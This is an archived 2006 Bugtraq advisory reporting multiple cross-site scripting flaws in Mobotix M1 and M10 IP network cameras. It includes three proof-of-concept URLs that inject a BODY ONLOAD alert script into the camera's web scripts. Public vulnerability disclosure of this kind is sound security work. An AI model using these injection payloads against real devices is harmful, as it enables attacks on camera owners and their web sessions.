lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060517202028.9144.qmail@securityfocus.com> Date: 17 May 2006 20:20:28 -0000 From: jaime.blasco@...el.es To: bugtraq@...urityfocus.com Subject: Mobotix IP Network Cameras Multiple XSS Mobotix IP Network Cameras Multiple XSS Version: Tested on M1 and M10 - M10-V2.0.5.2 - M1-V1.9.4.7 Discovered by: jaime.blasco(at)eazel(dot).es http://www.eazel.es Description: Mobotix is vulnerable to multiple security vulnerabilites that allow cross site scripting flaws. Due to improper filtering a remote attacker can cause a cross site scripting in these scripts: http://camera/help/help?%3CBODY%20ONLOAD=alert('www.eazel.es')%3E http://camera/control/events.tar?source_ip=%3CBODY%20ONLOAD=alert('www.eazel.es')%3E&download=egal http://camera/control/eventplayer?get_image_info_abspath=%3CBODY%20ONLOAD=alert('www.eazel.es')%3E The advisorie can be found at : http://www.eazel.es/media/advisory001.html